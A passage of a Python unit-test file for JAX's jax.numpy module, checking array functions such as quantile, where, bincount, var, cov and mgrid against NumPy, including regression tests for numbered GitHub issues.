        (((7,),), (np.int32,)),
        (((3,), (4,)), (np.int32, np.int32)),
        (((3,), (1,), (4,)), (np.int32, np.int32, np.int32)),
      )))
  def testIx_(self, shapes, dtypes):
    # jnp.ix_ vs np.ix_ for 0 to 3 index vectors, including a length-1 vector.
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype)
                          for shape, dtype in zip(shapes, dtypes)]
    self._CheckAgainstNumpy(np.ix_, jnp.ix_, args_maker)
    self._CompileAndCheck(jnp.ix_, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dimensions={}_dtype={}_sparse={}".format(
dimensions, dtype, sparse),
"dimensions": dimensions, "dtype": dtype, "sparse": sparse}
for dimensions in [(), (2,), (3, 0), (4, 5, 6)]
for dtype in number_dtypes
for sparse in [True, False]))
def testIndices(self, dimensions, dtype, sparse):
def args_maker(): return []
np_fun = partial(np.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
jnp_fun = partial(jnp.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name":
       "_op={}_a_shape={}_q_shape={}_axis={}_keepdims={}_interpolation={}".format(
         op,
         jtu.format_shape_dtype_string(a_shape, a_dtype),
         jtu.format_shape_dtype_string(q_shape, q_dtype),
         axis, keepdims, interpolation),
       "a_rng": jtu.rand_some_nan,
       "q_rng": q_rng, "op": op,
       "a_shape": a_shape, "a_dtype": a_dtype,
       "q_shape": q_shape, "q_dtype": q_dtype, "axis": axis,
       "keepdims": keepdims,
       "interpolation": interpolation}
      for (op, q_rng) in (
        ("percentile", partial(jtu.rand_uniform, low=0., high=100.)),
        ("quantile", partial(jtu.rand_uniform, low=0., high=1.)),
        ("nanpercentile", partial(jtu.rand_uniform, low=0., high=100.)),
        ("nanquantile", partial(jtu.rand_uniform, low=0., high=1.)),
      )
      for a_dtype in default_dtypes
      for a_shape, axis in (
        ((7,), None),
        ((47, 7), 0),
        ((4, 101), 1),
      )
      for q_dtype in [np.float32]
      for q_shape in scalar_shapes + [(4,)]
      for keepdims in [False, True]
      for interpolation in ['linear', 'lower', 'higher', 'nearest',
                            'midpoint']))
  def testQuantile(self, op, a_rng, q_rng, a_shape, a_dtype, q_shape, q_dtype,
                   axis, keepdims, interpolation):
    # Compares jnp.{percentile,quantile,nanpercentile,nanquantile} against
    # numpy on nan-seeded inputs across all interpolation modes.
    a_rng = a_rng(self.rng())
    q_rng = q_rng(self.rng())
    # NOTE(review): no op in this test's parameter space contains "median",
    # so this branch is dead here (likely shared boilerplate with testMedian).
    if "median" in op:
      args_maker = lambda: [a_rng(a_shape, a_dtype)]
    else:
      args_maker = lambda: [a_rng(a_shape, a_dtype), q_rng(q_shape, q_dtype)]
    def np_fun(*args):
      # numpy has no bfloat16 support; compute the reference in float32.
      args = [x if jnp.result_type(x) != jnp.bfloat16 else
              np.asarray(x, np.float32) for x in args]
      return getattr(np, op)(*args, axis=axis, keepdims=keepdims,
                             interpolation=interpolation)
    jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims,
                      interpolation=interpolation)
    # TODO(phawkins): we currently set dtype=False because we aren't as
    # aggressive about promoting to float64. It's not clear we want to mimic
    # Numpy here.
    tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
    tol = max(jtu.tolerance(a_dtype, tol_spec),
              jtu.tolerance(q_dtype, tol_spec))
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name":
       "_{}_a_shape={}_axis={}_keepdims={}".format(
         op, jtu.format_shape_dtype_string(a_shape, a_dtype),
         axis, keepdims),
       "op": op, "a_shape": a_shape, "a_dtype": a_dtype,
       "axis": axis,
       "keepdims": keepdims}
      for a_dtype in default_dtypes
      for a_shape, axis in (
        ((7,), None),
        ((47, 7), 0),
        ((4, 101), 1),
      )
      for keepdims in [False, True]
      for op in ["median", "nanmedian"]))
  def testMedian(self, op, a_shape, a_dtype, axis, keepdims):
    # jnp.median/nanmedian vs numpy; nanmedian gets nan-seeded input so the
    # nan-skipping path is actually exercised.
    if op == "median":
      a_rng = jtu.rand_default(self.rng())
    else:
      a_rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: [a_rng(a_shape, a_dtype)]
    def np_fun(*args):
      # numpy has no bfloat16 support; compute the reference in float32.
      args = [x if jnp.result_type(x) != jnp.bfloat16 else
              np.asarray(x, np.float32) for x in args]
      return getattr(np, op)(*args, axis=axis, keepdims=keepdims)
    jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims)
    # TODO(phawkins): we currently set dtype=False because we aren't as
    # aggressive about promoting to float64. It's not clear we want to mimic
    # Numpy here.
    tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
    tol = jtu.tolerance(a_dtype, tol_spec)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}".format(
          jtu.format_shape_dtype_string(shape, dtype)),
       "shape": shape, "dtype": dtype}
      for shape in all_shapes for dtype in all_dtypes))
  def testWhereOneArgument(self, shape, dtype):
    # One-argument jnp.where (i.e. nonzero) vs np.where on zero-seeded input.
    rng = jtu.rand_some_zero(self.rng())
    np_fun = lambda x: np.where(x)
    np_fun = jtu.ignore_warning(
      category=DeprecationWarning,
      message="Calling nonzero on 0d arrays.*")(np_fun)
    jnp_fun = lambda x: jnp.where(x)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)

    # JIT compilation requires specifying a size statically. Full test of
    # this behavior is in testNonzeroSize().
    jnp_fun = lambda x: jnp.where(x, size=np.size(x) // 2)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
        "testcase_name": "_{}".format("_".join(
          jtu.format_shape_dtype_string(shape, dtype)
          for shape, dtype in zip(shapes, dtypes))),
        "shapes": shapes, "dtypes": dtypes
      } for shapes in s(filter(_shapes_are_broadcast_compatible,
                               itertools.combinations_with_replacement(all_shapes, 3)))
        for dtypes in s(itertools.combinations_with_replacement(all_dtypes, 3)))))
  def testWhereThreeArgument(self, shapes, dtypes):
    # Three-argument jnp.where across broadcast-compatible shape triples and
    # mixed dtypes; the reference promotes like jnp to make results comparable.
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes)
    def np_fun(cond, x, y):
      return _promote_like_jnp(partial(np.where, cond))(x, y)
    self._CheckAgainstNumpy(np_fun, jnp.where, args_maker)
    self._CompileAndCheck(jnp.where, args_maker)
def testWhereScalarPromotion(self):
x = jnp.where(jnp.array([True, False]), 3,
jnp.ones((2,), dtype=jnp.float32))
self.assertEqual(x.dtype, np.dtype(np.float32))
  @parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
        "testcase_name": jtu.format_test_name_suffix("", shapes, (np.bool_,) * n + dtypes),
        "shapes": shapes, "dtypes": dtypes
      } for n in s(range(1, 3))
        for shapes in s(filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(all_shapes, 2 * n + 1)))
        for dtypes in s(itertools.combinations_with_replacement(all_dtypes, n + 1)))))
  def testSelect(self, shapes, dtypes):
    # jnp.select vs np.select with n conditions, n choices, and a default.
    rng = jtu.rand_default(self.rng())
    # shapes holds 2n+1 entries: n condition shapes, n choice shapes, and the
    # default's shape; dtypes holds n choice dtypes plus the default's dtype.
    n = len(dtypes) - 1
    def args_maker():
      condlist = [rng(shape, np.bool_) for shape in shapes[:n]]
      choicelist = [rng(shape, dtype)
                    for shape, dtype in zip(shapes[n:-1], dtypes[:n])]
      default = rng(shapes[-1], dtypes[-1])
      return condlist, choicelist, default
    # TODO(phawkins): float32/float64 type mismatches
    def np_fun(condlist, choicelist, default):
      # Pre-promote to the jnp result dtype (and work around numpy's missing
      # bfloat16 support) so the reference is comparable.
      choicelist = [x if jnp.result_type(x) != jnp.bfloat16
                    else x.astype(np.float32) for x in choicelist]
      dtype = jnp.result_type(default, *choicelist)
      return np.select(condlist,
                        [np.asarray(x, dtype=dtype) for x in choicelist],
                        np.asarray(default, dtype=dtype))
    self._CheckAgainstNumpy(np_fun, jnp.select, args_maker,
                            check_dtypes=False)
    self._CompileAndCheck(jnp.select, args_maker,
                          rtol={np.float64: 1e-7, np.complex128: 1e-7})
def testIssue330(self):
x = jnp.full((1, 1), jnp.array([1])[0]) # doesn't crash
self.assertEqual(x[0, 0], 1)
def testScalarDtypePromotion(self):
orig_numpy_result = (1 + np.eye(1, dtype=np.float32)).dtype
jax_numpy_result = (1 + jnp.eye(1, dtype=jnp.float32)).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
def testSymmetrizeDtypePromotion(self):
x = np.eye(3, dtype=np.float32)
orig_numpy_result = ((x + x.T) / 2).dtype
x = jnp.eye(3, dtype=jnp.float32)
jax_numpy_result = ((x + x.T) / 2).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because
# introducing the convention 0 * inf = 0 leads to silently wrong results in
# some cases. See this comment for details:
# https://github.com/google/jax/issues/1052#issuecomment-514083352
# def testIssue347(self):
# # https://github.com/google/jax/issues/347
# def test_fail(x):
# x = jnp.sqrt(jnp.sum(x ** 2, axis=1))
# ones = jnp.ones_like(x)
# x = jnp.where(x > 0.5, x, ones)
# return jnp.sum(x)
# x = jnp.array([[1, 2], [3, 4], [0, 0]], dtype=jnp.float64)
# result = api.grad(test_fail)(x)
# assert not np.any(np.isnan(result))
def testIssue453(self):
# https://github.com/google/jax/issues/453
a = np.arange(6) + 1
ans = jnp.reshape(a, (3, 2), order='F')
expected = np.reshape(a, (3, 2), order='F')
self.assertAllClose(ans, expected)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_op={}_dtype={}".format(op, pytype.__name__),
       "pytype": pytype, "dtype": dtype, "op": op}
      for pytype, dtype in [(int, jnp.int_), (float, jnp.float_),
                            (bool, jnp.bool_), (complex, jnp.complex_)]
      for op in ["atleast_1d", "atleast_2d", "atleast_3d"]))
  def testAtLeastNdLiterals(self, pytype, dtype, op):
    # Fixes: https://github.com/google/jax/issues/634
    # atleast_{1,2,3}d must accept bare Python scalars (int/float/bool/complex)
    # and produce jnp's default dtype for that scalar kind.
    np_fun = lambda arg: getattr(np, op)(arg).astype(dtype)
    jnp_fun = lambda arg: getattr(jnp, op)(arg)
    args_maker = lambda: [pytype(2)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{
"testcase_name": "_shape={}_dtype={}_weights={}_minlength={}_length={}".format(
shape, dtype, weights, minlength, length
),
"shape": shape,
"dtype": dtype,
"weights": weights,
"minlength": minlength,
"length": length}
for shape in [(0,), (5,), (10,)]
for dtype in int_dtypes
for weights in [True, False]
for minlength in [0, 20]
for length in [None, 10]
))
def testBincount(self, shape, dtype, weights, minlength, length):
rng = jtu.rand_positive(self.rng())
args_maker = lambda: (rng(shape, dtype), (rng(shape, 'float32') if weights else None))
np_fun = partial(np.bincount, minlength=minlength)
jnp_fun = partial(jnp.bincount, minlength=minlength, length=length)
if length is not None:
self._CompileAndCheck(jnp_fun, args_maker)
if length is None:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  def testBincountNegative(self):
    # Test that jnp.bincount ignores negative values.
    x_rng = jtu.rand_int(self.rng(), -100, 100)
    w_rng = jtu.rand_uniform(self.rng())
    shape = (1000,)
    x = x_rng(shape, 'int32')
    w = w_rng(shape, 'float32')
    xn = np.array(x)
    # NOTE(review): negatives are clamped to 0 *before* the >= 0 mask below,
    # so the mask selects everything and the numpy reference maps negative
    # inputs (and their weights) to bin 0 — presumably matching what
    # jnp.bincount does with negatives; confirm against the jnp implementation.
    xn[xn < 0] = 0
    wn = np.array(w)
    np_result = np.bincount(xn[xn >= 0], wn[xn >= 0])
    jnp_result = jnp.bincount(x, w)
    self.assertAllClose(np_result, jnp_result, check_dtypes=False)
  @parameterized.named_parameters(*jtu.cases_from_list(
      {"testcase_name": "_case={}".format(i),
       "input": input}
      for i, input in enumerate([
        3,
        [3],
        [np.array(3)],
        [np.array([3])],
        [[np.array(3)]],
        [[np.array([3])]],
        [3, 4, 5],
        [
          [np.eye(2, dtype=np.int32) * 2, np.zeros((2, 3), dtype=np.int32)],
          [np.ones((3, 2), dtype=np.int32), np.eye(3, dtype=np.int32) * 3],
        ],
        [np.array([1, 2, 3]), np.array([2, 3, 4]), 10],
        [np.ones((2, 2), dtype=np.int32), np.zeros((2, 2), dtype=np.int32)],
        [[np.array([1, 2, 3])], [np.array([2, 3, 4])]],
      ])))
  def testBlock(self, input):
    # jnp.block vs np.block on scalars, nested lists, and mixed array/scalar
    # inputs. (`input` shadows the builtin, but the name is fixed by the
    # parameterization dict keys above.)
    args_maker = lambda: [input]
    self._CheckAgainstNumpy(np.block, jnp.block, args_maker)
    self._CompileAndCheck(jnp.block, args_maker)
def testLongLong(self):
self.assertAllClose(np.int64(7), api.jit(lambda x: x)(np.longlong(7)))
  @jtu.ignore_warning(category=UserWarning,
                      message="Explicitly requested dtype.*")
  def testArange(self):
    # jnp.arange vs np.arange: start/stop/step combinations, dtype handling,
    # the no-argument error case, and laziness of the iota result.
    # test cases inspired by dask tests at
    # https://github.com/dask/dask/blob/main/dask/array/tests/test_creation.py#L92
    self.assertAllClose(jnp.arange(77),
                        np.arange(77, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(2, 13),
                        np.arange(2, 13, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(4, 21, 9),
                        np.arange(4, 21, 9, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(53, 5, -3),
                        np.arange(53, 5, -3, dtype=jnp.int_))
    self.assertAllClose(jnp.arange(77, dtype=float),
                        np.arange(77, dtype=float))
    self.assertAllClose(jnp.arange(2, 13, dtype=int),
                        np.arange(2, 13, dtype=int))
    # Empty result: step has the wrong sign for the start/stop interval.
    self.assertAllClose(jnp.arange(0, 1, -0.5),
                        np.arange(0, 1, -0.5, dtype=jnp.float_))

    self.assertRaises(TypeError, lambda: jnp.arange())

    # test that jnp.arange(N) doesn't instantiate an ndarray
    self.assertNotEqual(type(jnp.arange(77)), type(np.arange(77)))
    self.assertEqual(type(jnp.arange(77)), type(lax.iota(np.int32, 77)))

    # test that jnp.arange(N, dtype=int32) doesn't instantiate an ndarray
    self.assertNotEqual(type(jnp.arange(77, dtype=jnp.int32)),
                        type(np.arange(77, dtype=np.int32)))
    self.assertEqual(type(jnp.arange(77, dtype=jnp.int32)),
                     type(lax.iota(np.int32, 77)))
def testArangeJit(self):
ans = api.jit(lambda: jnp.arange(5))()
expected = np.arange(5)
self.assertAllClose(ans, expected)
def testIssue830(self):
a = jnp.arange(4, dtype=jnp.complex64)
self.assertEqual(a.dtype, jnp.complex64)
  def testIssue728(self):
    # Regression test for https://github.com/google/jax/issues/728:
    # large identity matrices must be exact (no off-diagonal garbage).
    assert jnp.allclose(jnp.eye(5000), np.eye(5000))
    self.assertEqual(0, np.sum(jnp.eye(1050) - np.eye(1050)))
  def testIssue746(self):
    # Regression test for https://github.com/google/jax/issues/746:
    # reshape on an arange result must not crash.
    jnp.arange(12).reshape(3, 4) # doesn't crash
  def testIssue764(self):
    # Gradient of sum(tanh(x)) for large x: values underflow toward zero and
    # must match an autograd float64 reference (no nan/overflow).
    x = jnp.linspace(190, 200, 4)
    f = api.grad(lambda x: jnp.sum(jnp.tanh(x)))
    # Expected values computed with autograd in float64 precision.
    expected = np.array([3.71669453e-165, 4.72999108e-168, 6.01954653e-171,
                         7.66067839e-174], np.float64)
    self.assertAllClose(f(x), expected, check_dtypes=False)
  def testIssue776(self):
    """Tests that the scatter-add transpose rule instantiates symbolic zeros."""
    # NOTE(review): relies on lax.tie_in, a legacy primitive — verify it still
    # exists in the lax version this file is pinned to.
    def f(u):
      y = jnp.ones(10).at[np.array([2, 4, 5])].add(u)
      # The transpose rule for lax.tie_in returns a symbolic zero for its first
      # argument.
      return lax.tie_in(y, 7.)

    self.assertAllClose(np.zeros(3,), api.grad(f)(np.ones(3,)))
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because this
# is a numerical stability issue that should be solved with a custom jvp rule
# of the sigmoid function being differentiated here, not by safe_mul.
# def testIssue777(self):
# x = jnp.linspace(-200, 0, 4, dtype=np.float32)
# f = api.grad(lambda x: jnp.sum(1 / (1 + jnp.exp(-x))))
# self.assertAllClose(f(x), np.array([0., 0., 0., 0.25], dtype=np.float32))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op, [()], [dtype]),
"dtype": dtype, "op": op}
for dtype in float_dtypes
for op in ("sqrt", "arccos", "arcsin", "arctan", "sin", "cos", "tan",
"sinh", "cosh", "tanh", "arccosh", "arcsinh", "arctanh", "exp",
"log", "expm1", "log1p")))
def testMathSpecialFloatValues(self, op, dtype):
np_op = getattr(np, op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="invalid value.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="overflow.*")(np_op)
jnp_op = getattr(jnp, op)
dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
for x in (np.nan, -np.inf, -100., -2., -1., 0., 1., 2., 100., np.inf,
jnp.finfo(dtype).max, np.sqrt(jnp.finfo(dtype).max),
np.sqrt(jnp.finfo(dtype).max) * 2.):
if (op in ("sin", "cos", "tan") and
jtu.device_under_test() == "tpu"):
continue # TODO(b/132196789): fix and reenable.
x = dtype(x)
expected = np_op(x)
actual = jnp_op(x)
tol = jtu.tolerance(dtype, {np.float32: 1e-3, np.float64: 1e-7})
self.assertAllClose(expected, actual, atol=tol,
rtol=tol)
  def testIssue883(self):
    # from https://github.com/google/jax/issues/883
    # The test is skipped unconditionally; the body below is kept as
    # documentation of the originally-reported repro.
    raise SkipTest("we decided to disallow arrays as static args")

    @partial(api.jit, static_argnums=(1,))
    def f(x, v):
      return x

    x = jnp.ones((10, 10))
    v = jnp.array([1, 2, 3])
    _ = f(x, v)
    _ = f(x, v)  # doesn't crash
def testReductionOfOutOfBoundsAxis(self): # Issue 888
x = jnp.ones((3, 4))
self.assertRaises(ValueError, lambda: jnp.sum(x, axis=2))
def testIssue956(self):
self.assertRaises(TypeError, lambda: jnp.ndarray((1, 1)))
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
          .format(shape, dtype, out_dtype, axis, ddof, keepdims),
         "shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
         "ddof": ddof, "keepdims": keepdims}
        for shape in [(5,), (10, 5)]
        for dtype in all_dtypes
        for out_dtype in inexact_dtypes
        for axis in [None, 0, -1]
        for ddof in [0, 1, 2]
        for keepdims in [False, True]))
  def testVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
    # jnp.var vs np.var across axes, ddof values and output dtypes; asking
    # for a real output dtype from complex input must raise ValueError.
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.")
    def np_fun(x):
      # Compute the reference at >= float32 precision, then cast to the
      # requested output dtype.
      out = np.var(x.astype(jnp.promote_types(np.float32, dtype)),
                   axis=axis, ddof=ddof, keepdims=keepdims)
      return out.astype(out_dtype)
    jnp_fun = partial(jnp.var, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
    tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
                                    np.float64: 1e-3, np.complex128: 1e-6})
    if (jnp.issubdtype(dtype, jnp.complexfloating) and
        not jnp.issubdtype(out_dtype, jnp.complexfloating)):
      self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
    else:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                              tol=tol)
      self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
                            atol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
          .format(shape, dtype, out_dtype, axis, ddof, keepdims),
         "shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
         "ddof": ddof, "keepdims": keepdims}
        for shape in [(5,), (10, 5)]
        for dtype in all_dtypes
        for out_dtype in inexact_dtypes
        for axis in [None, 0, -1]
        for ddof in [0, 1, 2]
        for keepdims in [False, True]))
  def testNanVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
    # jnp.nanvar vs np.nanvar on nan-seeded input, mirroring testVar;
    # complex input with a real output dtype must raise ValueError.
    rng = jtu.rand_some_nan(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.")
    def np_fun(x):
      # Compute the reference at >= float32 precision, then cast to the
      # requested output dtype.
      out = np.nanvar(x.astype(jnp.promote_types(np.float32, dtype)),
                      axis=axis, ddof=ddof, keepdims=keepdims)
      return out.astype(out_dtype)
    jnp_fun = partial(jnp.nanvar, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
    tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
                                    np.float64: 1e-3, np.complex128: 1e-6})
    if (jnp.issubdtype(dtype, jnp.complexfloating) and
        not jnp.issubdtype(out_dtype, jnp.complexfloating)):
      self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
    else:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                              tol=tol)
      self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
                            atol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name":
          "_shape={}_dtype={}_y_shape={}_y_dtype={}_rowvar={}_ddof={}_bias={}_fweights={}_aweights={}".format(
            shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights),
         "shape": shape, "y_shape": y_shape, "dtype": dtype, "y_dtype": y_dtype,"rowvar": rowvar, "ddof": ddof,
         "bias": bias, "fweights": fweights, "aweights": aweights}
        for shape in [(5,), (10, 5), (5, 10)]
        for dtype in all_dtypes
        for y_dtype in [None, dtype]
        for rowvar in [True, False]
        for y_shape in _get_y_shapes(y_dtype, shape, rowvar)
        for bias in [True, False]
        for ddof in [None, 2, 3]
        for fweights in [True, False]
        for aweights in [True, False]))
  def testCov(self, shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights):
    # jnp.cov vs np.cov with optional second variable, frequency weights and
    # observation weights, for both rowvar orientations.
    rng = jtu.rand_default(self.rng())
    wrng = jtu.rand_positive(self.rng())
    # Weights are real-valued even when the data dtype is complex.
    wdtype = np.real(dtype(0)).dtype
    # The weight vector spans the observation axis, which depends on rowvar.
    wshape = shape[-1:] if rowvar or shape[0] == 1 else shape[:1]
    args_maker = lambda: [rng(shape, dtype),
                          rng(y_shape, y_dtype) if y_dtype else None,
                          wrng(wshape, int) if fweights else None,
                          wrng(wshape, wdtype) if aweights else None]
    kwargs = dict(rowvar=rowvar, ddof=ddof, bias=bias)
    np_fun = lambda m, y, f, a: np.cov(m, y, fweights=f, aweights=a, **kwargs)
    jnp_fun = lambda m, y, f, a: jnp.cov(m, y, fweights=f, aweights=a, **kwargs)
    tol = {jnp.bfloat16: 5E-2, np.float16: 1E-2, np.float32: 1e-5,
           np.float64: 1e-13, np.complex64: 1e-5, np.complex128: 1e-13}
    tol = 7e-2 if jtu.device_under_test() == "tpu" else tol
    tol = jtu.join_tolerance(tol, jtu.tolerance(dtype))
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                          rtol=tol)
def testIssue967(self):
self.assertRaises(TypeError, lambda: jnp.zeros(1.5))
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shape={}_dtype={}_rowvar={}".format(
            shape, dtype.__name__, rowvar),
         "shape": shape, "dtype": dtype, "rowvar": rowvar}
        for shape in [(5,), (10, 5), (3, 10)]
        for dtype in number_dtypes
        for rowvar in [True, False]))
  def testCorrCoef(self, shape, dtype, rowvar):
    # jnp.corrcoef vs np.corrcoef for both rowvar orientations.
    rng = jtu.rand_default(self.rng())
    def args_maker():
      # Resample until the standard deviation is not near zero: corrcoef
      # divides by std, and near-zero std makes the comparison unstable.
      ok = False
      while not ok:
        x = rng(shape, dtype)
        ok = not np.any(np.isclose(np.std(x), 0.0))
      return (x,)
    np_fun = partial(np.corrcoef, rowvar=rowvar)
    np_fun = jtu.ignore_warning(
      category=RuntimeWarning, message="invalid value encountered.*")(np_fun)
    jnp_fun = partial(jnp.corrcoef, rowvar=rowvar)
    tol = 1e-2 if jtu.device_under_test() == "tpu" else None
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False,
        tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_{}_{}".format(jtu.format_shape_dtype_string(shape, dtype),
          "None" if end_dtype is None else jtu.format_shape_dtype_string(end_shape, end_dtype),
          "None" if begin_dtype is None else jtu.format_shape_dtype_string(begin_shape, begin_dtype)),
       "shape": shape, "dtype": dtype, "end_shape": end_shape,
       "end_dtype": end_dtype, "begin_shape": begin_shape,
       "begin_dtype": begin_dtype}
      for dtype in number_dtypes
      for end_dtype in [None] + [dtype]
      for begin_dtype in [None] + [dtype]
      for shape in [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE]
      for begin_shape in (
        [None] if begin_dtype is None
        else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])
      for end_shape in (
        [None] if end_dtype is None
        else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])))
  def testEDiff1d(self, shape, dtype, end_shape, end_dtype, begin_shape,
                  begin_dtype):
    # jnp.ediff1d vs np.ediff1d with every combination of optional
    # to_end/to_begin arrays (None means the argument is omitted).
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype),
                          (None if end_dtype is None else rng(end_shape, end_dtype)),
                          (None if begin_dtype is None else rng(begin_shape, begin_dtype))]
    np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
    jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
def testEDiff1dWithDtypeCast(self):
rng = jtu.rand_default(self.rng())
shape = jtu.NUMPY_SCALAR_SHAPE
dtype = jnp.float32
end_dtype = jnp.int32
args_maker = lambda: [rng(shape, dtype), rng(shape, end_dtype), rng(shape, dtype)]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shapes={}_dtype={}_indexing={}_sparse={}".format(
            shapes, dtype, indexing, sparse),
         "shapes": shapes, "dtype": dtype, "indexing": indexing,
         "sparse": sparse}
        for shapes in [(), (5,), (5, 3)]
        for dtype in number_dtypes
        for indexing in ['xy', 'ij']
        for sparse in [True, False]))
  def testMeshGrid(self, shapes, dtype, indexing, sparse):
    # jnp.meshgrid vs np.meshgrid for both indexing conventions and
    # sparse/dense outputs, with 0 to 2 input vectors.
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [(x,) for x in shapes],
                                    [dtype] * len(shapes))
    np_fun = partial(np.meshgrid, indexing=indexing, sparse=sparse)
    jnp_fun = partial(jnp.meshgrid, indexing=indexing, sparse=sparse)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testMgrid(self):
    # jnp.mgrid vs np.mgrid: single/multi-slice forms, explicit steps,
    # complex-number step counts, non-integer steps, and tracing errors.
    # Integer steps must match numpy exactly.
    assertAllEqual = partial(self.assertAllClose, atol=0, rtol=0)
    assertAllEqual(np.mgrid[:4], jnp.mgrid[:4])
    assertAllEqual(np.mgrid[:4,], jnp.mgrid[:4,])
    assertAllEqual(np.mgrid[:4], jax.jit(lambda: jnp.mgrid[:4])())
    assertAllEqual(np.mgrid[:5, :5], jnp.mgrid[:5, :5])
    assertAllEqual(np.mgrid[:3, :2], jnp.mgrid[:3, :2])
    assertAllEqual(np.mgrid[1:4:2], jnp.mgrid[1:4:2])
    assertAllEqual(np.mgrid[1:5:3, :5], jnp.mgrid[1:5:3, :5])
    assertAllEqual(np.mgrid[:3, :2, :5], jnp.mgrid[:3, :2, :5])
